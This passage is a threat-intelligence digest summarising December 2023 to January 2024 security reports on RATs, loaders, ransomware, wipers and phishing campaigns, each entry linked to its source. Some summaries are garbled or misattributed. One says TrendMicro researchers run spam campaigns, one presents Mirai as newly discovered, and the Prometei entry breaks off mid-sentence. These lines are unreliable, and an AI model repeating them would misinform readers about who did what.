Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: Researchers at Cyfirma have shed light on how RAT development is changing and the nefarious actions carried out by threat actors going by the handle "Anonymous Arabic." The group looked at the Silver RAT, which is built in C sharp and can start browsers, hidden apps, keyloggers, and other dangerous programs discreetly while evading antivirus software.

Source: https://www.cyfirma.com/outofband/a-gamer-turned-malware-developer-diving-into-silverrat-and-its-syrian-roots/

Intel Source:: TrendMicro

Intel Name:: Pikabot_Malware_Thirstily_Involved_In_Spam_Campaigns

Date of Scan:: 2024-01-10

Impact:: HIGH

Summary:: TrendMicro researchers are actively involved in spam efforts that result in ransomware attacks using the Black Basta virus. Using a loader and a core module which allows illegal remote access and the execution of arbitrary commands over an established connection with their C&C server, they are utilizing these two components to target victims with their phishing campaigns.

Source: https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

Intel Source:: Hunt & Hackett

Intel Name:: Dutch_IT_And_Telecom_Firms_Targeted_by_Turkish_Sea_Turtles_Group

Date of Scan:: 2024-01-08

Impact:: LOW

Summary:: The cyber espionage group Sea Turtle (also known as Teal Kurma, Marbled Dust, SILICON, and Cosmic Wolf) is detected by researchers from the Dutch security firm Hunt & Hackett targeting Kurdish websites, media, ISPs, telcos, and IT service providers in the Netherlands.

Source: https://www.huntandhackett.com/blog/turkish-espionage-campaigns

Intel Source:: ISC.SANS

Intel Name:: Unusual_Prometei_Botnet_Behavior

Date of Scan:: 2024-01-08

Impact:: LOW

Summary:: ISC.SANS researchers have discovered that following several attempts at logging in with different usernames and passwords, the actor utilizing the IP

Source: https://isc.sans.edu/diary/Suspicious+Prometei+Botnet+Activity/30538/

Intel Source:: Greg Lesnewich

Intel Name:: New_North_Korean_macOS_Backdoor

Date of Scan:: 2024-01-08

Impact:: LOW

Summary:: A new backdoor for Apple macOS named SpectralBlur has been found by cybersecurity experts. It overlaps with a family of malware that is known to be associated with North Korean threat actors.

Source: https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html

Intel Source:: CERT-UA

Intel Name:: Attacks_on_Ukrainian_Servicemen_Targeting_Recruitment_to_3rd_OSHBr_And_IDF

Date of Scan:: 2024-01-08

Impact:: MEDIUM

Summary:: Experts from Trendmicro notified CERT-UA of the discovery of suspicious files, the majority of which had military themes. Based on the information that was obtained, CERT-UA moved to look into a number of cyberattacks that are targeting soldiers of the Armed Forces of Ukraine under the pretense of recruiting for the Israel Defense Forces (IDF) and the 3rd Separate Assault Brigade.

Source: https://cert.gov.ua/article/6276988

Intel Source:: AT&T

Intel Name:: Decoys_Govno_DGAs_And_Obfuscation_in_AsyncRAT_Loaders

Date of Scan:: 2024-01-05

Impact:: LOW

Summary:: Researchers at AT&T Alien Labs have discovered a campaign to install AsyncRAT on victim PCs without their knowledge. This threat actor has been working on distributing the RAT via an initial JavaScript file embedded in a phishing page for at least 11 months. The threat actor is steadfast in their goals even after more than 300 samples and more than 100 domains have passed.

Source: https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno

Intel Source:: ClearSkySec

Intel Name:: Attack_by_Iranian_APT_using_wipers_on_Albania

Date of Scan:: 2024-01-05

Impact:: MEDIUM

Summary:: The Iranian psychological operation group "Homeland Justice" claimed to be eliminating "terrorist supporters" once more in a video that was uploaded to its Telegram channel on December 24, 2023, and it was shared in Albanian. Since July 2022, this gang has been active, concentrating on ransomware and damaging activities directed at Albania. The following Albanian infrastructure and government agencies' computer systems and webpages were totally compromised and erased, the actor declared on its official website and Telegram channel the next day.

Source: https://www.clearskysec.com/wp-content/uploads/2024/01/No-Justice-Wiper.pdf

Intel Source:: Palo Alto

Intel Name:: JinxLoader_Delivers_Next_Stage_Malware_Like_Formbook_and_XLoader

Date of Scan:: 2024-01-05

Impact:: LOW

Summary:: Researchers from Symantec and Palo Alto Networks alerted us to the existence of JinxLoader, a new Go-based malware loader that is being used to spread next-stage payloads like XLoader and Formbook. Additionally, in November 2023, the malware was noticed, and it was reported that from April 30, 2023, it has been promoted on the hacking community Hackforums. The researchers detected an assault that employed phishing communications purporting to be from the Abu Dhabi National Oil Company (ADNOC).

Source: https://twitter.com/Unit42_Intel/status/1730237085246775562

Intel Source:: Uptycs

Intel Name:: UAC_0050_Targeting_Ukraine_With_Remcos_RAT_Pipe_Method

Date of Scan:: 2024-01-04

Impact:: LOW

Summary:: The UAC-0050 threat group, well-known for its history of unrelenting cyberattacks against targets in Ukraine, is back at it. However, this time, researchers at Uptycs have uncovered a sophisticated tactic that permits a more covert data transfer channel, successfully eluding antivirus and Endpoint Detection and Response (EDR) detection methods.

Source: https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method

Intel Source:: Fortinet

Intel Name:: Cryptomining_PyPI_Packages_Targeting_Linux

Date of Scan:: 2024-01-04

Impact:: LOW

Summary:: Researchers from FortiGate have noted that three new malicious packages that have the ability to install a cryptocurrency miner on vulnerable Linux computers have been found in the Python Package Index (PyPI) open-source repository.

Source: https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices

Intel Source:: Fortinet

Intel Name:: 8base_Ransomware_Roundup

Date of Scan:: 2024-01-03

Impact:: MEDIUM

Summary:: The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants. 8base is a financially motivated ransomware variant most likely based on the Phobos ransomware. Per our FortiRecon information, the 8base ransomware first appeared in May 2023.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-8base

Intel Source:: ISC.SANS

Intel Name:: Malicious_malspam_attachments

Date of Scan:: 2024-01-03

Impact:: LOW

Summary:: John Kopriva from ISC.SANS shared his observations of over the last 12 months, 1152 potentially malicious attachments of different types that got trapped by his malspam trap. When he decompressed and/or unpacked all the images and archives, removed all duplicates, and eliminated all the non-malicious files, he was still left with 525 unique malicious samples – 285 of these were PE files with various extensions, and the rest were a wide assortment of scripts, Office files, PDFs, help files, shortcut links, etc.

Source: https://isc.sans.edu/diary/rss/30524

Intel Source:: Antiy

Intel Name:: Analysis_of_the_Ransomware_Attack_On_Boeing

Date of Scan:: 2024-01-03

Impact:: MEDIUM

Summary:: Antiy CERT reviewed recent major attack cases and selected the Boeing Company’s extortion attack that was linked to the LockBit group and completed a complete analysis. Antiy CERT has been monitoring attacks for a long time and made its analysis of these ransomware attacks. The researchers continued to pay attention to attack organizations such as LockBit, forming a relatively systematic analysis and accumulation. Relying on the intelligence data of the Antiy Cyber Ultrain platform, CISA, and other agencies have launched relevant public information released by this incident.

Source: https://www.antiy.cn/research/notice&report/research_report/BoeingReport.html

Intel Source:: Palo Alto

Intel Name:: The_summarized_malware_families_roundups

Date of Scan:: 2024-01-03

Impact:: MEDIUM

Summary:: This article summarizes the malware families (and groups pushing malware) seen by Unit 42. This article reviews all our timely threat intelligence released from October through December 2023.

Source: https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/

Intel Source:: Resecurity

Intel Name:: The_implementation_of_Artificial_Intelligence_for_invoice_fraud

Date of Scan:: 2024-01-03

Impact:: LOW

Summary:: Resecurity discovered a threat actors group "GXC Team", which is known for crafting tools for online banking theft, e-commerce deception, and internet scams. This time this group introduced a new tool that incorporates Artificial Intelligence with the creation of fraudulent invoices used for Wire fraud and Business E-Mail Compromise (BEC). According to an FBI IC3 report, successful business email compromise (BEC) scams (such as invoice fraud) resulted in an average loss of over $120,000 per incident, inflicting a staggering financial toll of more than $2.4 billion on organizations.

Source: https://www.resecurity.com/blog/article/cybercriminals-implemented-artificial-intelligence-ai-for-invoice-fraud

Intel Source:: Resecurity

Intel Name:: New_Version_Of_Medusa_Stealer_Released

Date of Scan:: 2024-01-02

Impact:: LOW

Summary:: Resecurity researchers observed last week the details of the New Medusa Stealer malware. The release version of Meduza is 2.2, a significantly upgraded password stealer poised to wreak havoc on unsuspecting victims. One of the new capabilities of this stealer is the support of more software clients (including browser-based cryptocurrency wallets), an upgraded credit card (CC) grabber, and additional advanced mechanisms for password storage dump on various platforms to extract credentials and tokens.

Source: https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web

Intel Source:: Cyber Security news

Intel Name:: The_use_of_weaponized_LNK_files_to_exploit_vulnerabilities_in_Windows

Date of Scan:: 2024-01-02

Impact:: MEDIUM

Summary:: Last month, cybersecurity researchers at ASEC identified that the Kimsuky group has been actively using the weaponized LNK file to deploy AppleSeed malware. Hackers use weaponized LNK files to exploit vulnerabilities in Windows operating systems. These files often contain malicious code that can be executed when the user clicks on the shortcut.

Source: https://cybersecuritynews.com/kimsuky-appleseed-malware/

Intel Source:: SOC Radar

Intel Name:: Diving_Deep_into_Cactus_Ransomware

Date of Scan:: 2024-01-02

Impact:: LOW

Summary:: Since its discovery in March 2023, the Cactus Ransomware Group has quickly expanded throughout the digital sphere, taking use of flaws in VPNs in particular to obtain access without authorization and establish a presence on compromised systems. The organization has proven to have a deep understanding of evasion strategies by using a dynamic approach to encryption and a variety of tools and procedures to ensure the efficient and discrete delivery of its malicious payload.

Source: https://socradar.io/dark-web-profile-cactus-ransomware/

Intel Source:: Microsoft

Intel Name:: Microsoft_Stops_MSIX_Protocol_Handler_Used_Maliciously

Date of Scan:: 2023-12-29

Impact:: MEDIUM

Summary:: After several financially motivated threat groups used the MSIX ms-appinstaller protocol handler to infect Windows users with malware, Microsoft disabled it once more. In order to get around security measures that would normally shield Windows users from malware, such as the Defender SmartScreen anti-phishing and anti-malware component and built-in browser alerts warning users against downloading executable files, the attackers took advantage of the CVE-2021-43890 Windows AppX Installer spoofing vulnerability.

Source: https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

Intel Source:: Barracuda

Intel Name:: New_Zero_Day_in_Barracuda_s_ESG_Appliances

Date of Scan:: 2023-12-28

Impact:: LOW

Summary:: Barracuda posted that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoors on a "limited number" of devices. It is assigned to CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library named Spreadsheet::ParseExcel that's used by the Amavis scanner within the gateway to screen Microsoft Excel email attachments for malware.

Source: https://www.barracuda.com/company/legal/esg-vulnerability https://thehackernews.com/2023/12/chinese-hackers-exploited-new-zero-day.html

Intel Source:: Cyble

Intel Name:: QBit_Stealer_s_source_code_malicious_feature

Date of Scan:: 2023-12-28

Impact:: LOW

Summary:: After analyzing qBit Stealer’s source code, the Cyble research team discovered a unique feature not like any other stealers, qBit selectively targets files with specific extensions. This characteristic implies its potential use as an exfiltration tool in ransomware operations.

Source: https://cyble.com/blog/decoding-qbit-stealers-source-release-and-data-exfiltration-prowess/

Intel Source:: CERT UA

Intel Name:: A_Domain_Controller_is_Threatened_Within_an_Hour_of_Attack

Date of Scan:: 2023-12-28

Impact:: MEDIUM

Summary:: Following an investigation by CERT-UA researchers into an incident, it was discovered that the aforementioned links take the victim to a webpage where, using JavaScript and features of the application protocol "search" ("ms-search"), a shortcut file is downloaded, which when opened, causes the launch of A PowerShell script created to launch (open) a spoof document and download it from a remote (SMB) resource, together with the Python interpreter and the Client.py file marked as MASEPIE.

Source: https://cert.gov.ua/article/6276894

Intel Source:: ASEC

Intel Name:: Trend_Analysis_of_Kimsuky_Group_Attacks

Date of Scan:: 2023-12-28

Impact:: LOW

Summary:: Spear phishing attacks are a regular tactic used by the Kimsuky threat group to target South Korean users. Typically, the organization sends out malicious files that appear to be document attachments for emails. Users may not be able to operate their machine when they launch these attachments.

Source: https://asec.ahnlab.com/en/60054/

Intel Source:: SANS

Intel Name:: A_Glimpse_into_DShield_Honeypot_Activity

Date of Scan:: 2023-12-28

Impact:: LOW

Summary:: ISC.SANS researchers have discovered a disruptive malware strain called Mirai, which has caused havoc since it was discovered. It takes advantage of security flaws in IoT devices and turns them into a "botnet," or network of bots, that can be used to launch massive network attacks.

Source: https://isc.sans.edu/diary/rss/30514

Intel Source:: Esentire

Intel Name:: Ande_Loader_and_SwaetRAT_analysis

Date of Scan:: 2023-12-27

Impact:: LOW

Summary:: This article analyzes the malicious payloads used by the PhantomControl threat actors. It explains the process of retrieving the base64-encoded data from the downloaded image, the parameters passed to the "VAI" method, and the core payload, SwaetRAT, written in .NET and has key logging capabilities. It also explains the ID generation algorithm, the commands handled by the ReadPacket class, and the creation of persistence via startup folders and process hollowing techniques. Finally, it provides a Yara rule on SwaetRAT and recommendations for protection.

Source: https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

Intel Source:: Security Intelligence

Intel Name:: Advanced_Web_Injection_Campaignu_unraveling_the_Tactics_of_a_Sophisticated_Threat

Date of Scan:: 2023-12-27

Impact:: MEDIUM

Summary:: In a recent analysis, IBM Security Trusteer has uncovered a sophisticated web injection campaign that utilizes JavaScript injections, impacting over 40 banks across North America, South America, Europe, and Japan. This malware, possibly linked to DanaBot, employs evasive techniques, including dynamic web injection, to compromise popular banking applications. The injected JavaScript targets specific pages within banks, aiming to intercept user credentials and potentially monetize banking information. The attackers purchased malicious domains in December 2022, initiating campaigns since early 2023. The web injection's dynamic behavior, communication with a command and control server, and adaptability make it a significant threat to the security of financial institutions and their customers. Users are advised to remain vigilant, report suspicious activities, and follow best practices for security.

Source: https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/

Intel Source:: Checkpoint

Intel Name:: The_spike_of_phishing_attacks_with_Crypto_drainers

Date of Scan:: 2023-12-27

Impact:: LOW

Summary:: This article examines the threat of phishing attacks with crypto drainers, which involve malicious smart contracts and deceptive websites to deceive users into giving away their tokens. It explains the Angel Drainer technique, a phishing attack that uses permit functions to transfer tokens without the user's knowledge. Tips are provided on how to safeguard against these attacks.

Source: https://research.checkpoint.com/2023/the-rising-threat-of-phishing-attacks-with-crypto-drainers/

Intel Source:: Deep Instinct

Intel Name:: Threat_Actor_UAC_0099_continues_to_target_Ukraine

Date of Scan:: 2023-12-27

Impact:: LOW

Summary:: Threat actor 'UAC-0099' has been targeting Ukraine since mid-2022, using a fabricated court summons to bait targets, a RAR SFX with LNK infection vector, and a HTA infection vector. They have also exploited a WinRAR vulnerability, CVE-2023-38831. To reduce risk, monitoring and limiting PowerShell and scheduled tasks is recommended, as well as updating WinRAR. IOCs and POC for CVE-2023-38831 can be found on GitHub.

Source: https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine

Intel Source:: thehackernews

Intel Name:: PikaBot_Malware_Spreads_via_Malvertising_Campaign_Targeting_AnyDesk_Users

Date of Scan:: 2023-12-27

Impact:: LOW

Summary:: Security researchers have uncovered a malvertising campaign spreading the PikaBot malware, particularly targeting users searching for legitimate software like AnyDesk. PikaBot, previously distributed through malspam campaigns, serves as a loader and backdoor, allowing unauthorized remote access to compromised systems. In this campaign, threat actors, including the notorious TA577, leverage malicious Google ads for AnyDesk that redirect victims to a fake website hosting a malicious MSI installer on Dropbox. The malvertising tactic involves bypassing Google's security checks with a tracking URL via a legitimate marketing platform. The attack is reminiscent of malvertising chains previously observed with other loader malware, indicating a potential trend in "malvertising-as-a-service." This discovery follows a surge in malicious ads through Google searches for popular software, indicating a growing threat in browser-based attacks.

Source: https://thehackernews.com/2023/12/new-malvertising-campaign-distributing.html

Intel Source:: Barracuda

Intel Name:: Vulnerability_in_Barracuda_Email_Security_Gateway_Appliance

Date of Scan:: 2023-12-27

Impact:: LOW

Summary:: According to the findings of Barracuda experts' ongoing investigation, a threat actor deployed a specially designed Excel email attachment to target a certain number of ESG devices by taking use of an Arbitrary Code Execution (ACE) vulnerability within a third-party library, Spreadsheet::ParseExcel.

Source: https://www.barracuda.com/company/legal/esg-vulnerability

Intel Source:: Imperva

Intel Name:: 8220_Gang_Evolving_Tactics_Exploiting_Web_Servers

Date of Scan:: 2023-12-26

Impact:: LOW

Summary:: Imperva Threat Research uncovers new activity from the 8220 gang, a Chinese-origin threat group known for deploying cryptojacking malware on both Windows and Linux web servers. The blog details recent exploits, attack vectors, and indicators of compromise (IoCs), emphasizing the importance of patching and robust security measures for organizations. The group's evolving tactics include exploiting vulnerabilities such as CVE-2021-44228, CVE-2017-3506, and CVE-2020-14883 to propagate malware, with Imperva providing mitigation through its Cloud WAF and on-prem WAF.

Source: https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/

Intel Source:: Sucuri

Intel Name:: MageCart_WordPress_Plugin_Injects_Malicious_stuff

Date of Scan:: 2023-12-26

Impact:: LOW

Summary:: A new strain of MageCart malware has been identified, targeting WordPress/WooCommerce e-commerce websites. The malware injects itself into the mu-plugins directory, concealing its presence and making removal challenging. Operating under the guise of a fake WordPress Cache Addons plugin, the malware goes to great lengths to avoid detection and removal, even restricting the use of file manager plugins. Notably, it creates a hidden administrator user account, providing attackers sustained access. The malware's primary goal is credit card skimming, injecting sophisticated JavaScript into the website's checkout page.

Source: https://blog.sucuri.net/2023/12/magecart-wordpress-plugin-injects-malicious-user-credit-card-skimmer.html

Intel Source:: Inflobox

Intel Name:: A_Comprehensive_Analysis_of_Phishing_Infrastructure_and_Tactics

Date of Scan:: 2023-12-26

Impact:: LOW

Summary:: The United States Postal Service (USPS) has become a prime target for a surge in SMS phishing attacks, colloquially known as smishing, since July. Chinese threat actors dominate this trend, utilizing a dark market toolkit to facilitate attacks on various messaging platforms and carriers. The toolkit's ease of use and affordability have contributed to a notable increase in USPS-themed phishing campaigns. While previous reports have focused on specific campaigns, actors, or the toolkit itself, this analysis delves into a comprehensive examination of over 7,000 USPS-related domains, revealing distinct techniques, tactics, and procedures (TTPs) observable in the Domain Name System (DNS).

Source: https://blogs.infoblox.com/cyber-threat-intelligence/phishers-weather-the-storm-the-dns-landscape-of-us-postal-smishing-attacks/

Intel Source:: Fortinet

Intel Name:: Bandook_malware_behavior

Date of Scan:: 2023-12-26

Impact:: LOW

Summary:: FortiGuard Labs has discovered a new variant of the Bandook malware, a persistent remote access trojan (RAT) with origins dating back to 2007. This latest variant is distributed through a PDF file containing a shortened URL, leading to a password-protected .7z file. Upon extraction, the malware injects its payload into the msinfo32.exe process. The malware exhibits a refined injection process and establishes persistence through registry manipulation. The communication with its command and control (C2) server involves an array of commands, including file manipulation, information stealing, and control over the victim's computer. FortiGuard Labs provides insights into the malware's behavior and the added complexity in its latest variant, offering protections against the identified threats.

Source: https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving

Intel Source:: ASEC

Intel Name:: Analysis_of_SSH_Scanner_Malware_Attacks_on_Linux_Servers

Date of Scan:: 2023-12-26

Impact:: LOW

Summary:: AhnLab Security Emergency Response Center (ASEC) has conducted a detailed analysis of recent attack campaigns targeting poorly managed Linux SSH servers. In addition to commonly installed malware like DDoS bots and CoinMiners, threat actors are employing SSH scanner malware to extract valuable information, including IP addresses and SSH account credentials. This article outlines the attack flow, including the utilization of tools such as ShellBot, Tsunami, ChinaZ DDoS Bot, and XMRig CoinMiner.

Source: https://asec.ahnlab.com/en/59972/

Intel Source:: Seqrite

Intel Name:: A_Sophisticated_Phishing_Campaign_Targeting_Indian_Government_Personnel

Date of Scan:: 2023-12-26

Impact:: LOW

Summary:: Operation RusticWeb is an advanced phishing campaign, active since October 2023, that specifically targets Indian government personnel, notably in the defense sector. The threat actors employ Rust-based payloads and encrypted PowerShell scripts for file system enumeration and exfiltration of confidential documents. Noteworthy tactics include the use of fake domains mimicking government entities, such as the Army Welfare Education Society (AWES) and the Department of Personnel & Training. The campaign, exhibiting similarities with known APT groups linked to Pakistan, reflects a shift towards newer programming languages like Rust.

Source: https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/

Intel Source:: Sophos

Intel Name:: Akira_ransomware_came_back

Date of Scan:: 2023-12-24

Impact:: MEDIUM

Summary:: There was an observation of some incidents involving Akira ransomware which has a big impact on different areas and countries. According to the evidence, Akira has primarily targeted organizations in Europe, North America, and Australia, and operates in the government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunication sectors.

Source: https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/

Intel Source:: CERT-UA

Intel Name:: New_UAC_0050_attack_using_RemcosRAT

Date of Scan:: 2023-12-23

Impact:: MEDIUM

Summary:: Recently, the CERT-UA has observed the mass distribution of e-mails with the subject "Debts under the Kyivstar contract" and an attachment in the form of the "Subscriber debt.zip" archive.

Source: https://cert.gov.ua/article/6276824

Intel Source:: Trustwave

Intel Name:: HR_Themed_Spam_Emails

Date of Scan:: 2023-12-21

Impact:: LOW

Summary:: Trustwave provided their details on some recent campaigns that use HR-related themes, along with their context and a run-through of their attack flow.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/surfing-the-tidal-waves-of-hr-themed-spam-emails/

Intel Source:: Netscope

Intel Name:: The_Nim_based_Campaign_Using_Microsoft_Word_Docs

Date of Scan:: 2023-12-21

Impact:: LOW

Summary:: Netskope did some analysis of a malicious backdoor written in Nim, which is a relatively new programming language. Their blog gives detailed analyses of a recent targeted threat that uses Word document bait to deliver a Nim backdoor.

Source: https://www.netskope.com/blog/a-look-at-the-nim-based-campaign-using-microsoft-word-docs-to-impersonate-the-nepali-government

Intel Source:: Intezer

Intel Name:: Operation_HamsaUpdate

Date of Scan:: 2023-12-21

Impact:: HIGH

Summary:: The Israel National Cyber Directorate alarmed a warning about a phishing campaign actively targeting Israeli customers using F5’s network devices. They named it this operation as an Operation HamsaUpdate. This campaign started the deployment of a newly developed wiper malware that targets both Windows and Linux servers.

Source: https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/

Intel Source:: Security Intelligence

Intel Name:: Web_injections_are_on_the_rise

Date of Scan:: 2023-12-21

Impact:: LOW

Summary:: Security Intelligence researchers did deep analyses of the web injection utilized in the recent campaign, its evasive techniques, code flow, targets and the methods employed to achieve them. Analysts discovered that in this new campaign, threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users’ credentials in order to access then and likely monetize their banking information.

Source: https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/

Intel Source:: Proofpoint

Intel Name:: Some_malware_clusters_spreads_via_email_and_fake_browser_updates

Date of Scan:: 2023-12-21

Impact:: LOW

Summary:: Recently It was observed that DarkGate remote access Trojan (RAT) was used by multiple cybercrime actors and was spread via many methods such as email, Microsoft Teams, Skype, malvertising, and fake updates. And the researchers provided details about the RogueRaticate and BattleRoyal fake update activity cluster fake update activity cluster.

Source: https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates

Intel Source:: CERT-UA

Intel Name:: Modus_operandi_UAC_0177_JokerDPR_attack

Date of Scan:: 2023-12-20

Impact:: MEDIUM

Summary:: The government of Ukraine CERT-UA investigated one of the incidents, information about which was published in a manipulative form on the Telegram channel JokerDPR. It was found that one of the methods of implementing cyber threats carried out by "followers" JokerDPR and/or the information about which is published in the mentioned channel, is conducting phishing attacks aimed at obtaining unauthorized access to the accounts of the mail services Google, Ukr.Net, Outlook, as well as the cryptocurrency exchanges EXMO and Binance.

Source: https://cert.gov.ua/article/6276799

Intel Source:: Symantec

Intel Name:: Seedworm_Iranian_Hackers_Target_Telecoms

Date of Scan:: 2023-12-20

Impact:: MEDIUM

Summary:: Iranian espionage group Seedworm (aka Muddywater) attacked telecom companies in Egypt, Sudan, and Tanzania. This group has been active since 2017 and attacked companies in many countries. It is believed to be a part of Iran’s Ministry of Intelligence and Security. The threat actors used a variety of tools in this activity. Researchers on Symantec’s Threat Hunter Team, part of Broadcom are investigating hacker activity and found a MuddyC2Go PowerShell launcher. The attackers also use the SimpleHelp remote access tool and Venom Proxy, which have previously been associated with Seedworm activity, as well as a custom key logging tool, and other publicly available and living-off-the-land tools.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms

Intel Source:: Zscaler

Intel Name:: Agent_Tesla_delivery

Date of Scan:: 2023-12-20

Impact:: LOW

Summary:: ZScaler analyzed Agent Tesla's new tactics employed by threat actors to deploy Agent Tesla malware using CVE-2017-11882. Agent Tesla is an advanced keylogger with features like clipboard logging, screen key logging, screen capturing, and extracting stored passwords from web browsers.

Source: https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla

Intel Source:: AT&T

Intel Name:: JaskaGO_malware_attacks_on_macOS_and_Windows

Date of Scan:: 2023-12-20

Impact:: MEDIUM

Summary:: AT&T Alien Labs has discovered a sophisticated malware stealer strain crafted in the Go programming language, impacting as a severe threat to both Windows and macOS operating systems.

Source: https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows

Intel Source:: ReliaQuest

Intel Name:: Double_Extortion_Attack_Analysis

Date of Scan:: 2023-12-20

Impact:: LOW

Summary:: A couple of months ago, ReliaQuest detected some unknown process executions inside of the customer’s environment, originating from the Windows debug directory. The analysts' analysis showed that these executions as part of a more significant cyber-threat incident that resulted in double extortion: the encryption of customer data, followed by ransomware deployment and a threat to release the data publicly.

Source: https://www.reliaquest.com/blog/double-extortion-attack-analysis/

Intel Source:: Trustwave

Intel Name:: Instagram_Phishing_attacks

Date of Scan:: 2023-12-20

Impact:: LOW

Summary:: Trustwave researchers observed another campaign of Instagram “Copyright Infringement” phishing emails in their spam traps. In this new campaign, in addition, the threat actors also target to obtain the victim’s Instagram backup codes. This campaign is an enhanced version of what we reported on the SpiderLabs blog titled “Insta-Phish-A-Gram”.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/instagram-phishing-targets-backup-codes/

Intel Source:: PaloAlto

Intel Name:: Malicious_JavaScript_samples_to_steal_sensitive_information

Date of Scan:: 2023-12-20

Impact:: LOW

Summary:: Unit 42 researchers have observed threat actors using malicious JavaScript samples to steal sensitive information by abusing popular survey sites, low-quality hosting, and web chat APIs. In some campaigns, attackers created chatbots that they registered to someone noteworthy such as an Australian footballer. Other malware campaigns had both web skimmers injected into compromised sites and traditional phishing sites.

Source: https://unit42.paloaltonetworks.com/malicious-javascript-steals-sensitive-data/

Intel Source:: Reversing Labs

Intel Name:: Two_novel_techniques_deployed_on_GitHub

Date of Scan:: 2023-12-20

Impact:: MEDIUM

Summary:: ReversingLabs researchers have uncovered two novel techniques running on GitHub — one abusing GitHub Gists, another issuing commands through git commit messages.

Source: https://www.reversinglabs.com/blog/malware-leveraging-public-infrastructure-like-github-on-the-rise

Intel Source:: ASEC

Intel Name:: Ongoing_Exploitation_of_Apache_ActiveMQ_Vulnerability

Date of Scan:: 2023-12-19

Impact:: MEDIUM

Summary:: A recent blog post by AhnLab Security Emergency Response Center (ASEC) reveals that threat actors continue to exploit the Apache ActiveMQ vulnerability (CVE-2023-46604). The vulnerability, allowing remote code execution in the messaging and integration pattern server, has been targeted by various threat actors for deploying Ladon, NetCat, AnyDesk, and z0Miner.

Source: https://asec.ahnlab.com/en/59904/

Intel Source:: Cyberint

Intel Name:: Anonymous_Sudan_expansion

Date of Scan:: 2023-12-19

Impact:: LOW

Summary:: In December 2023 Cyberint detected that Anonymous Sudan claimed responsibility for disrupting the Discord login page in collaboration with SKYNET and GodzillaBotnet. This action stands among a series of recent collaborative attacks the groups executed.

Source: https://cyberint.com/blog/research/anonymous-sudan-an-analysis/

Intel Source:: Any.Run

Intel Name:: Malware_Trends_Tracker

Date of Scan:: 2023-12-19

Impact:: LOW

Summary:: "Every day Any.Run researchers upload a lot of submissions to ANY.RUN sandbox, many of them with malicious verdicts. That’s why researchers created Malware Trends Tracker. They provide in their malware description malware history, recent samples, malware distribution method, malware execution video, detection process, global, week, and month ranks, IOCs – latest IP addresses, Hashes, domain names, URLs.

Source: https://any.run/cybersecurity-blog/malware-statistics-and-trends/

Intel Source:: CISA

Intel Name:: The_Play_ransomware_group

Date of Scan:: 2023-12-19

Impact:: MEDIUM

Summary:: The FBI, CISA, and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Play Ransomware, to disseminate Play ransomware group’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data, and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia.

Source: https://www.cisa.gov/news-events/alerts/2023/12/18/fbi-cisa-and-asds-acsc-release-advisory-play-ransomware

Intel Source:: Trellix

Intel Name:: Cybercriminals_abuse_GitHub_tool_Predator

Date of Scan:: 2023-12-19

Impact:: LOW

Summary:: Trellix showed in their blog how cybercriminals have abused this GitHub tool Predator and how it has been used in multiple phishing campaigns with frequently changing url patterns in a very short span. Predator, a tool designed to combat bots and web crawlers, can distinguish web requests originating from automated systems, bots, or web crawlers.

Source: https://www.trellix.com/about/newsroom/stories/research/cybercrooks-leveraging-anti-automation-toolkit-for-phishing-campaigns/

Intel Source:: Cyfirma

Intel Name:: The_Sidewinder_group_cyber_intrusion_tactics

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: Cyfirma published their report which describes a recent threat actor's campaign with a malicious Word document equipped with an embedded macro, unraveling a sophisticated cyber threat orchestrated by the Sidewinder group possibly to target Nepalese government officials. That threat started with a potentially spear-phished email delivering a malicious Word document. After downloading and upon opening the document, the embedded macro executes, manipulating victims into enabling macros.

Source: https://www.cyfirma.com/outofband/from-macro-to-payload-decrypting-the-sidewinder-cyber-intrusion-tactics/

Intel Source:: PaloAlto

Intel Name:: Early_Detection_of_Malicious_Stockpiled_Domains

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: Palo Alto analysts described techniques used by cybercriminals evolved into domain wars.

Source: https://unit42.paloaltonetworks.com/detecting-malicious-stockpiled-domains/

Intel Source:: Rewterz

